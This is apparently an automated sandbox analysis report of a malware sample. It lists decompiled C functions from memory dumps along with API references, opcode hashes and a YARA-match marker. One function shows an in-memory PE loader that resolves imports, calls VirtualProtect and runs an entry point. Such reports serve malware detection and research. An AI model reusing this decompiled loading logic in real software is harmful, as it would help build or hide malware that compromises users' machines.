                                                                                                                                                                                                                                • String ID: @MxtNxt
                                                                                                                                                                                                                                • API String ID: 4097109750-1701360479
                                                                                                                                                                                                                                • Opcode ID: ebc722039f04ba27c9fcd471a0b894ac4412b5741b4afe152d3be5cdee049b2c
                                                                                                                                                                                                                                • Instruction ID: 225238a6ec548ca9ceb790d2fd4dd339e0532d4f62778acec482f5d1a50b3d86
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: ebc722039f04ba27c9fcd471a0b894ac4412b5741b4afe152d3be5cdee049b2c
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8A418D72210609BFDF219FE4CD85EAE7BF9EB04784F10452AF64289060EBB19A45CB70
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                                                                                                			E00A92AE3(void* __ecx, void* __edx, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, signed int _a16) {
                                                                                                                                                                                                                                				struct _FILETIME _v12;
                                                                                                                                                                                                                                				void* _t11;
                                                                                                                                                                                                                                				void* _t16;
                                                                                                                                                                                                                                				short _t19;
                                                                                                                                                                                                                                				void* _t22;
                                                                                                                                                                                                                                				void* _t24;
                                                                                                                                                                                                                                				void* _t25;
                                                                                                                                                                                                                                				short* _t26;
                                                                                                                                                                                                                                
                                                                                                                                                                                                                                				_t24 = __edx;
                                                                                                                                                                                                                                				_t25 = E00A93037(_t11, _a12);
                                                                                                                                                                                                                                				if(_t25 == 0) {
                                                                                                                                                                                                                                					_t22 = 8;
                                                                                                                                                                                                                                				} else {
                                                                                                                                                                                                                                					_t26 = _t25 + _a16 * 2;
                                                                                                                                                                                                                                					 *_t26 = 0; // executed
                                                                                                                                                                                                                                					_t16 = E00A99DA2(__ecx, _a4, _a8, _t25); // executed
                                                                                                                                                                                                                                					_t22 = _t16;
                                                                                                                                                                                                                                					if(_t22 == 0) {
                                                                                                                                                                                                                                						GetSystemTimeAsFileTime( &_v12);
                                                                                                                                                                                                                                						_t19 = 0x5f;
                                                                                                                                                                                                                                						 *_t26 = _t19;
                                                                                                                                                                                                                                						_t22 = E00A99BAF(_t24, _a4, 0x80000001, _a8, _t25,  &_v12, 8);
                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                					HeapFree( *0xa9d270, 0, _t25);
                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                				return _t22;
                                                                                                                                                                                                                                			}












                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                  • Part of subcall function 00A93037: lstrlen.KERNEL32(?,00000000,04FD9BB8,00000000,00A96F37,04FD9D96,?,?,?,?,?,69B25F44,00000005,00A9D00C), ref: 00A9303E
                                                                                                                                                                                                                                  • Part of subcall function 00A93037: mbstowcs.NTDLL ref: 00A93067
                                                                                                                                                                                                                                  • Part of subcall function 00A93037: memset.NTDLL ref: 00A93079
                                                                                                                                                                                                                                • GetSystemTimeAsFileTime.KERNEL32(004F0053,004F0053,00000014,00000000,00000008,00000000,74785520,00000008,00000014,004F0053,04FD9364), ref: 00A92B1B
                                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000,00000000,004F0053,00000014,00000000,00000008,00000000,74785520,00000008,00000014,004F0053,04FD9364), ref: 00A92B49
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000003.00000002.880047850.0000000000A91000.00000020.00020000.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000003.00000002.880026215.0000000000A90000.00000004.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000003.00000002.880089761.0000000000A9C000.00000002.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000003.00000002.880147576.0000000000A9D000.00000004.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000003.00000002.880155943.0000000000A9F000.00000002.00020000.sdmp
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: Time$FileFreeHeapSystemlstrlenmbstowcsmemset
                                                                                                                                                                                                                                • String ID: Uxt
                                                                                                                                                                                                                                • API String ID: 1500278894-1536154274
                                                                                                                                                                                                                                • Opcode ID: cda3a5b98e80cd3ddb72eaf52f9dc4bc31054bbd90c498f4da5c6eed444dfc45
                                                                                                                                                                                                                                • Instruction ID: 05ef3d55cee510f50e8663c187087838f2f3dfec7db83673e8ff1bd004a0f2fd
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: cda3a5b98e80cd3ddb72eaf52f9dc4bc31054bbd90c498f4da5c6eed444dfc45
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2B017C36310249BADF216FA99D85F9B7BF9EF84714F10002AFA009A161EA72D9658760
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                C-Code - Quality: 47%
                                                                                                                                                                                                                                			E00A95341(char* _a4, char** _a8) {
                                                                                                                                                                                                                                				char* _t7;
                                                                                                                                                                                                                                				char* _t11;
                                                                                                                                                                                                                                				char* _t14;
                                                                                                                                                                                                                                				char* _t16;
                                                                                                                                                                                                                                				char* _t17;
                                                                                                                                                                                                                                				char _t18;
                                                                                                                                                                                                                                				signed int _t20;
                                                                                                                                                                                                                                				signed int _t22;
                                                                                                                                                                                                                                
                                                                                                                                                                                                                                				_t16 = _a4;
                                                                                                                                                                                                                                				_push(0x20);
                                                                                                                                                                                                                                				_t20 = 1;
                                                                                                                                                                                                                                				_push(_t16);
                                                                                                                                                                                                                                				while(1) {
                                                                                                                                                                                                                                					_t7 = StrChrA();
                                                                                                                                                                                                                                					if(_t7 == 0) {
                                                                                                                                                                                                                                						break;
                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                					_t20 = _t20 + 1;
                                                                                                                                                                                                                                					_push(0x20);
                                                                                                                                                                                                                                					_push( &(_t7[1]));
                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                				_t11 = E00A95157(_t20 << 2);
                                                                                                                                                                                                                                				_a4 = _t11;
                                                                                                                                                                                                                                				if(_t11 != 0) {
                                                                                                                                                                                                                                					StrTrimA(_t16, 0xa9c2a4); // executed
                                                                                                                                                                                                                                					_t22 = 0;
                                                                                                                                                                                                                                					do {
                                                                                                                                                                                                                                						_t14 = StrChrA(_t16, 0x20);
                                                                                                                                                                                                                                						if(_t14 != 0) {
                                                                                                                                                                                                                                							 *_t14 = 0;
                                                                                                                                                                                                                                							do {
                                                                                                                                                                                                                                								_t14 =  &(_t14[1]);
                                                                                                                                                                                                                                								_t18 =  *_t14;
                                                                                                                                                                                                                                							} while (_t18 == 0x20 || _t18 == 9);
                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                						_t17 = _a4;
                                                                                                                                                                                                                                						 *(_t17 + _t22 * 4) = _t16;
                                                                                                                                                                                                                                						_t22 = _t22 + 1;
                                                                                                                                                                                                                                						_t16 = _t14;
                                                                                                                                                                                                                                					} while (_t14 != 0);
                                                                                                                                                                                                                                					 *_a8 = _t17;
                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                				return 0;
                                                                                                                                                                                                                                			}











                                                                                                                                                                                                                                0x00a9539c
                                                                                                                                                                                                                                0x00a9539f
                                                                                                                                                                                                                                0x00a953a2
                                                                                                                                                                                                                                0x00a953a3
                                                                                                                                                                                                                                0x00a953a5
                                                                                                                                                                                                                                0x00a953ac
                                                                                                                                                                                                                                0x00a953ac
                                                                                                                                                                                                                                0x00a953b8

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • StrChrA.SHLWAPI(?,00000020,00000000,04FD95AC,00A95884,?,00A9461A,?,04FD95AC,?,00A95884), ref: 00A9535D
                                                                                                                                                                                                                                • StrTrimA.SHLWAPI(?,00A9C2A4,00000002,?,00A9461A,?,04FD95AC,?,00A95884), ref: 00A9537B
                                                                                                                                                                                                                                • StrChrA.SHLWAPI(?,00000020,?,00A9461A,?,04FD95AC,?,00A95884), ref: 00A95386
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000003.00000002.880047850.0000000000A91000.00000020.00020000.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000003.00000002.880026215.0000000000A90000.00000004.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000003.00000002.880089761.0000000000A9C000.00000002.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000003.00000002.880147576.0000000000A9D000.00000004.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000003.00000002.880155943.0000000000A9F000.00000002.00020000.sdmp
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: Trim
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 3043112668-0
                                                                                                                                                                                                                                • Opcode ID: 5c28c4e3f70f9961530ca232ad30495d86ed035db00732e80ba77ce457364ad2
                                                                                                                                                                                                                                • Instruction ID: f1c0b1c0f31b7243c75a60367eb9b11932a78ca29425a297b91937bd668d291c
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5c28c4e3f70f9961530ca232ad30495d86ed035db00732e80ba77ce457364ad2
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F201B175B007466FEB165B7A8C6AF6B7BDDEB85380F141011BA45CF282D9B0C8428760
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                C-Code - Quality: 32%
                                                                                                                                                                                                                                			E00A95B8B(intOrPtr _a4, signed int _a8) {
                                                                                                                                                                                                                                				long _v8;
                                                                                                                                                                                                                                				long _v12;
                                                                                                                                                                                                                                				char _v16;
                                                                                                                                                                                                                                				void* _t14;
                                                                                                                                                                                                                                				long _t15;
                                                                                                                                                                                                                                				char* _t17;
                                                                                                                                                                                                                                				intOrPtr* _t19;
                                                                                                                                                                                                                                				signed int _t22;
                                                                                                                                                                                                                                
                                                                                                                                                                                                                                				_t19 = __imp__; // 0x7021e700
                                                                                                                                                                                                                                				_t22 =  ~_a8;
                                                                                                                                                                                                                                				_v12 = 0;
                                                                                                                                                                                                                                				asm("sbb esi, esi");
                                                                                                                                                                                                                                				while(1) {
                                                                                                                                                                                                                                					_v8 = 0;
                                                                                                                                                                                                                                					_t14 =  *_t19(_a4, _a8, _t22, 0, 0, 0, 0); // executed
                                                                                                                                                                                                                                					if(_t14 != 0) {
                                                                                                                                                                                                                                						break;
                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                					_t15 = GetLastError();
                                                                                                                                                                                                                                					_v8 = _t15;
                                                                                                                                                                                                                                					if(_t15 != 0x2f8f) {
                                                                                                                                                                                                                                						if(_t15 == 0x2f00) {
                                                                                                                                                                                                                                							continue;
                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                					} else {
                                                                                                                                                                                                                                						_v16 = 0x3300;
                                                                                                                                                                                                                                						if(_v12 == 0) {
                                                                                                                                                                                                                                							_t17 =  &_v16;
                                                                                                                                                                                                                                							__imp__(_a4, 0x1f, _t17, 4);
                                                                                                                                                                                                                                							if(_t17 == 0) {
                                                                                                                                                                                                                                								_v8 = GetLastError();
                                                                                                                                                                                                                                							} else {
                                                                                                                                                                                                                                								_v12 = 1;
                                                                                                                                                                                                                                								continue;
                                                                                                                                                                                                                                							}
                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                					L9:
                                                                                                                                                                                                                                					return _v8;
                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                				goto L9;
                                                                                                                                                                                                                                			}












                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • GetLastError.KERNEL32 ref: 00A95BA8
                                                                                                                                                                                                                                • GetLastError.KERNEL32(?,?,?,?,00A9A77A,00000000,?,?), ref: 00A95BFF
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000003.00000002.880047850.0000000000A91000.00000020.00020000.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000003.00000002.880026215.0000000000A90000.00000004.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000003.00000002.880089761.0000000000A9C000.00000002.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000003.00000002.880147576.0000000000A9D000.00000004.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000003.00000002.880155943.0000000000A9F000.00000002.00020000.sdmp
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: ErrorLast
                                                                                                                                                                                                                                • String ID: @MxtNxt
                                                                                                                                                                                                                                • API String ID: 1452528299-1701360479
                                                                                                                                                                                                                                • Opcode ID: 74b32cfce10eab130f519c213abd771e159f4309e9d9819323559b0e25fe6f08
                                                                                                                                                                                                                                • Instruction ID: c0cda94174d4e13ba8eb315226a531923d287f1967e94d1786fcfd1558143c01
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 74b32cfce10eab130f519c213abd771e159f4309e9d9819323559b0e25fe6f08
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 24014035E04608FBDF11DFB6DC49D9EBFF8EB85750F108066E905E2150D6708A44DBA0
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                                                                                                			E00A953BB(void* _a4) {
                                                                                                                                                                                                                                				char _t2;
                                                                                                                                                                                                                                
                                                                                                                                                                                                                                				_t2 = RtlFreeHeap( *0xa9d270, 0, _a4); // executed
                                                                                                                                                                                                                                				return _t2;
                                                                                                                                                                                                                                			}




                                                                                                                                                                                                                                0x00a953c7
                                                                                                                                                                                                                                0x00a953cd

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • RtlFreeHeap.NTDLL(00000000,00000000,00A912FA,00000000,?,?,00000000), ref: 00A953C7
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000003.00000002.880047850.0000000000A91000.00000020.00020000.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000003.00000002.880026215.0000000000A90000.00000004.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000003.00000002.880089761.0000000000A9C000.00000002.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000003.00000002.880147576.0000000000A9D000.00000004.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000003.00000002.880155943.0000000000A9F000.00000002.00020000.sdmp
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: FreeHeap
                                                                                                                                                                                                                                • String ID: Uxt
                                                                                                                                                                                                                                • API String ID: 3298025750-1536154274
                                                                                                                                                                                                                                • Opcode ID: aa3764984cc7292ef507970298d78278d390c311f143ab2d1ed2d2360731379c
                                                                                                                                                                                                                                • Instruction ID: aca9cadea1c18a4a26e09415d7fc8f93ae71156dfe1226a444faafeebf91fe12
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: aa3764984cc7292ef507970298d78278d390c311f143ab2d1ed2d2360731379c
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 84B012F1300100EBCE21CBD0DF04F05BA31B750700F004013B30400070CA315422FB25
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                C-Code - Quality: 75%
                                                                                                                                                                                                                                			E00A96B85(void* __ecx, void* _a4, intOrPtr _a8, char _a12, intOrPtr _a16, char _a20, intOrPtr _a24, intOrPtr* _a28) {
                                                                                                                                                                                                                                				void* _v8;
                                                                                                                                                                                                                                				void* __esi;
                                                                                                                                                                                                                                				intOrPtr* _t35;
                                                                                                                                                                                                                                				void* _t40;
                                                                                                                                                                                                                                				intOrPtr* _t41;
                                                                                                                                                                                                                                				intOrPtr* _t43;
                                                                                                                                                                                                                                				intOrPtr* _t45;
                                                                                                                                                                                                                                				intOrPtr* _t50;
                                                                                                                                                                                                                                				intOrPtr* _t52;
                                                                                                                                                                                                                                				void* _t54;
                                                                                                                                                                                                                                				intOrPtr* _t55;
                                                                                                                                                                                                                                				intOrPtr* _t57;
                                                                                                                                                                                                                                				intOrPtr* _t61;
                                                                                                                                                                                                                                				intOrPtr* _t65;
                                                                                                                                                                                                                                				intOrPtr _t68;
                                                                                                                                                                                                                                				void* _t72;
                                                                                                                                                                                                                                				void* _t75;
                                                                                                                                                                                                                                				void* _t76;
                                                                                                                                                                                                                                
                                                                                                                                                                                                                                				_t55 = _a4;
                                                                                                                                                                                                                                				_t35 =  *((intOrPtr*)(_t55 + 4));
                                                                                                                                                                                                                                				_a4 = 0;
                                                                                                                                                                                                                                				_t76 =  *((intOrPtr*)( *_t35 + 0x4c))(_t35, _a16, 0,  &_v8, 0, _t72, _t75, _t54, __ecx, __ecx);
                                                                                                                                                                                                                                				if(_t76 < 0) {
                                                                                                                                                                                                                                					L18:
                                                                                                                                                                                                                                					return _t76;
                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                				_t40 = E00A94A6A(_v8, _a8, _a12, _a20,  &_a20,  &_a12); // executed
                                                                                                                                                                                                                                				_t76 = _t40;
                                                                                                                                                                                                                                				if(_t76 >= 0) {
                                                                                                                                                                                                                                					_t61 = _a28;
                                                                                                                                                                                                                                					if(_t61 != 0 &&  *_t61 != 0) {
                                                                                                                                                                                                                                						_t52 = _v8;
                                                                                                                                                                                                                                						_t76 =  *((intOrPtr*)( *_t52 + 0x14))(_t52, _a24, 0, _t61, 0);
                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                					if(_t76 >= 0) {
                                                                                                                                                                                                                                						_t43 =  *_t55;
                                                                                                                                                                                                                                						_t68 =  *0xa9d2e0; // 0x453a5a8
                                                                                                                                                                                                                                						_t20 = _t68 + 0xa9e1fc; // 0x740053
                                                                                                                                                                                                                                						_t76 =  *((intOrPtr*)( *_t43 + 0x60))(_t43, _t20, _a16, 0, 0, _v8,  &_a4, 0);
                                                                                                                                                                                                                                						if(_t76 >= 0) {
                                                                                                                                                                                                                                							_t76 = E00A95626(_a4);
                                                                                                                                                                                                                                							if(_t76 >= 0) {
                                                                                                                                                                                                                                								_t65 = _a28;
                                                                                                                                                                                                                                								if(_t65 != 0 &&  *_t65 == 0) {
                                                                                                                                                                                                                                									_t50 = _a4;
                                                                                                                                                                                                                                									_t76 =  *((intOrPtr*)( *_t50 + 0x10))(_t50, _a24, 0, _t65, 0, 0);
                                                                                                                                                                                                                                								}
                                                                                                                                                                                                                                							}
                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                						_t45 = _a4;
                                                                                                                                                                                                                                						if(_t45 != 0) {
                                                                                                                                                                                                                                							 *((intOrPtr*)( *_t45 + 8))(_t45);
                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                						_t57 = __imp__#6;
                                                                                                                                                                                                                                						if(_a20 != 0) {
                                                                                                                                                                                                                                							 *_t57(_a20);
                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                						if(_a12 != 0) {
                                                                                                                                                                                                                                							 *_t57(_a12);
                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                				_t41 = _v8;
                                                                                                                                                                                                                                				 *((intOrPtr*)( *_t41 + 8))(_t41);
                                                                                                                                                                                                                                				goto L18;
                                                                                                                                                                                                                                			}





















                                                                                                                                                                                                                                0x00a96c4e
                                                                                                                                                                                                                                0x00a96c53
                                                                                                                                                                                                                                0x00a96c53
                                                                                                                                                                                                                                0x00a96c56
                                                                                                                                                                                                                                0x00a96c5f
                                                                                                                                                                                                                                0x00a96c64
                                                                                                                                                                                                                                0x00a96c64
                                                                                                                                                                                                                                0x00a96c69
                                                                                                                                                                                                                                0x00a96c6e
                                                                                                                                                                                                                                0x00a96c6e
                                                                                                                                                                                                                                0x00a96c69
                                                                                                                                                                                                                                0x00a96bf3
                                                                                                                                                                                                                                0x00a96c70
                                                                                                                                                                                                                                0x00a96c76
                                                                                                                                                                                                                                0x00000000

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                  • Part of subcall function 00A94A6A: SysAllocString.OLEAUT32(80000002), ref: 00A94AC7
                                                                                                                                                                                                                                  • Part of subcall function 00A94A6A: SysFreeString.OLEAUT32(00000000), ref: 00A94B2D
                                                                                                                                                                                                                                • SysFreeString.OLEAUT32(?), ref: 00A96C64
                                                                                                                                                                                                                                • SysFreeString.OLEAUT32(00A948F5), ref: 00A96C6E
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000003.00000002.880047850.0000000000A91000.00000020.00020000.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000003.00000002.880026215.0000000000A90000.00000004.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000003.00000002.880089761.0000000000A9C000.00000002.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000003.00000002.880147576.0000000000A9D000.00000004.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000003.00000002.880155943.0000000000A9F000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: String$Free$Alloc
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 986138563-0
                                                                                                                                                                                                                                • Opcode ID: 3fb47859ddc7b1167c6d651d9afc790c80827529c1622601dd678bbfe0009be6
                                                                                                                                                                                                                                • Instruction ID: 5517a6a2cc065f0a6704588841a64043a6ea86b94bbf95c23dc3f418ed7ee348
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3fb47859ddc7b1167c6d651d9afc790c80827529c1622601dd678bbfe0009be6
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: CF312A72600119EFCF15DFA9C988C9BBBB9FFC97407144659F8459B220E632DD51CBA0
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                C-Code - Quality: 86%
                                                                                                                                                                                                                                			E00A61F7C(void* __eax) {
                                                                                                                                                                                                                                				char _v8;
                                                                                                                                                                                                                                				void* _v12;
                                                                                                                                                                                                                                				void* __edi;
                                                                                                                                                                                                                                				void* _t18;
                                                                                                                                                                                                                                				long _t24;
                                                                                                                                                                                                                                				long _t26;
                                                                                                                                                                                                                                				long _t29;
                                                                                                                                                                                                                                				intOrPtr _t40;
                                                                                                                                                                                                                                				void* _t41;
                                                                                                                                                                                                                                				intOrPtr* _t42;
                                                                                                                                                                                                                                				void* _t44;
                                                                                                                                                                                                                                
                                                                                                                                                                                                                                				_t41 = __eax;
                                                                                                                                                                                                                                				_t16 =  *0xa641c0;
                                                                                                                                                                                                                                				_t33 =  *((intOrPtr*)( *((intOrPtr*)(__eax + 0x3c)) + __eax + 0x50)) +  *0xa641c0 - 0x69b24f45 &  !( *0xa641c0 - 0x69b24f45);
                                                                                                                                                                                                                                				_t18 = E00A61C61( *((intOrPtr*)( *((intOrPtr*)(__eax + 0x3c)) + __eax + 0x50)) +  *0xa641c0 - 0x69b24f45 &  !( *0xa641c0 - 0x69b24f45),  *((intOrPtr*)( *((intOrPtr*)(__eax + 0x3c)) + __eax + 0x50)) +  *0xa641c0 - 0x69b24f45 &  !( *0xa641c0 - 0x69b24f45), _t16 + 0x964da0fc,  &_v8,  &_v12); // executed
                                                                                                                                                                                                                                				if(_t18 != 0) {
                                                                                                                                                                                                                                					_t29 = 8;
                                                                                                                                                                                                                                					goto L8;
                                                                                                                                                                                                                                				} else {
                                                                                                                                                                                                                                					_t40 = _v8;
                                                                                                                                                                                                                                					_t29 = E00A61AF2(_t33, _t40, _t41);
                                                                                                                                                                                                                                					if(_t29 == 0) {
                                                                                                                                                                                                                                						_t44 =  *((intOrPtr*)(_t40 + 0x3c)) + _t40;
                                                                                                                                                                                                                                						_t24 = E00A616C3(_t40, _t44); // executed
                                                                                                                                                                                                                                						_t29 = _t24;
                                                                                                                                                                                                                                						if(_t29 == 0) {
                                                                                                                                                                                                                                							_t26 = E00A61B7F(_t44, _t40); // executed
                                                                                                                                                                                                                                							_t29 = _t26;
                                                                                                                                                                                                                                							if(_t29 == 0) {
                                                                                                                                                                                                                                								_push(_t26);
                                                                                                                                                                                                                                								_push(1);
                                                                                                                                                                                                                                								_push(_t40);
                                                                                                                                                                                                                                								if( *((intOrPtr*)( *((intOrPtr*)(_t44 + 0x28)) + _t40))() == 0) {
                                                                                                                                                                                                                                									_t29 = GetLastError();
                                                                                                                                                                                                                                								}
                                                                                                                                                                                                                                							}
                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                					_t42 = _v12;
                                                                                                                                                                                                                                					 *((intOrPtr*)(_t42 + 0x18))( *((intOrPtr*)(_t42 + 0x1c))( *_t42));
                                                                                                                                                                                                                                					E00A61F0A(_t42);
                                                                                                                                                                                                                                					L8:
                                                                                                                                                                                                                                					return _t29;
                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                			}















                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                  • Part of subcall function 00A61C61: GetModuleHandleA.KERNEL32(?,00000020,?,?,?,?,?,00A61FB8,?,?,?,?,?,00000002,?,?), ref: 00A61C85
                                                                                                                                                                                                                                  • Part of subcall function 00A61C61: GetProcAddress.KERNEL32(00000000,?), ref: 00A61CA7
                                                                                                                                                                                                                                  • Part of subcall function 00A61C61: GetProcAddress.KERNEL32(00000000,?), ref: 00A61CBD
                                                                                                                                                                                                                                  • Part of subcall function 00A61C61: GetProcAddress.KERNEL32(00000000,?), ref: 00A61CD3
                                                                                                                                                                                                                                  • Part of subcall function 00A61C61: GetProcAddress.KERNEL32(00000000,?), ref: 00A61CE9
                                                                                                                                                                                                                                  • Part of subcall function 00A61C61: GetProcAddress.KERNEL32(00000000,?), ref: 00A61CFF
                                                                                                                                                                                                                                  • Part of subcall function 00A61AF2: memcpy.NTDLL(00000002,?,00A61FC6,?,?,?,?,?,00A61FC6,?,?,?,?,?,?,?), ref: 00A61B29
                                                                                                                                                                                                                                  • Part of subcall function 00A61AF2: memcpy.NTDLL(00000002,?,?,?,00000002), ref: 00A61B5E
                                                                                                                                                                                                                                  • Part of subcall function 00A616C3: LoadLibraryA.KERNEL32(?,?,00000000,?,?), ref: 00A616FB
                                                                                                                                                                                                                                  • Part of subcall function 00A61B7F: VirtualProtect.KERNEL32(00000000,?,?,?,?,?,00000000,?,?), ref: 00A61BB8
                                                                                                                                                                                                                                  • Part of subcall function 00A61B7F: VirtualProtect.KERNEL32(00000000,?,?,?), ref: 00A61C2D
                                                                                                                                                                                                                                  • Part of subcall function 00A61B7F: GetLastError.KERNEL32 ref: 00A61C33
                                                                                                                                                                                                                                • GetLastError.KERNEL32(?,?), ref: 00A61FFA
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000003.00000002.879916049.0000000000A60000.00000040.00000010.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000003.00000002.879953190.0000000000A65000.00000040.00000010.sdmp Download File
                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: AddressProc$ErrorLastProtectVirtualmemcpy$HandleLibraryLoadModule
                                                                                                                                                                                                                                • String ID: @Mxt MxtTxt
                                                                                                                                                                                                                                • API String ID: 2673762927-1084903527
                                                                                                                                                                                                                                • Opcode ID: bd76e6eeae303486a9e66122e57a5c58ca5653aa8ce7b68299430e088b80f67a
                                                                                                                                                                                                                                • Instruction ID: 55436c56f19618a339a911487f1282007b6258fd27585ce994688b0901e1af70
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: bd76e6eeae303486a9e66122e57a5c58ca5653aa8ce7b68299430e088b80f67a
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 59113A76600711AFD721ABE9CC81EEF7BFCBF983147054129FA0297601EAE1ED068790
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                                                                                                			E00A61064() {
                                                                                                                                                                                                                                				char _v16;
                                                                                                                                                                                                                                				intOrPtr _v28;
                                                                                                                                                                                                                                				void _v32;
                                                                                                                                                                                                                                				void* _v36;
                                                                                                                                                                                                                                				intOrPtr _t15;
                                                                                                                                                                                                                                				void* _t16;
                                                                                                                                                                                                                                				long _t25;
                                                                                                                                                                                                                                				int _t26;
                                                                                                                                                                                                                                				void* _t30;
                                                                                                                                                                                                                                				intOrPtr* _t32;
                                                                                                                                                                                                                                				signed int _t36;
                                                                                                                                                                                                                                				intOrPtr _t39;
                                                                                                                                                                                                                                
                                                                                                                                                                                                                                				_t15 =  *0xa641c4;
                                                                                                                                                                                                                                				if( *0xa641ac > 5) {
                                                                                                                                                                                                                                					_t16 = _t15 + 0xa650f9;
                                                                                                                                                                                                                                				} else {
                                                                                                                                                                                                                                					_t16 = _t15 + 0xa650b1;
                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                				E00A614A8(_t16, _t16);
                                                                                                                                                                                                                                				_t36 = 6;
                                                                                                                                                                                                                                				memset( &_v32, 0, _t36 << 2);
                                                                                                                                                                                                                                				if(E00A619C5( &_v32,  &_v16,  *0xa641c0 ^ 0xf7a71548) == 0) {
                                                                                                                                                                                                                                					_t25 = 0xb;
                                                                                                                                                                                                                                				} else {
                                                                                                                                                                                                                                					_t26 = lstrlenW( *0xa641b8);
                                                                                                                                                                                                                                					_t8 = _t26 + 2; // 0x2
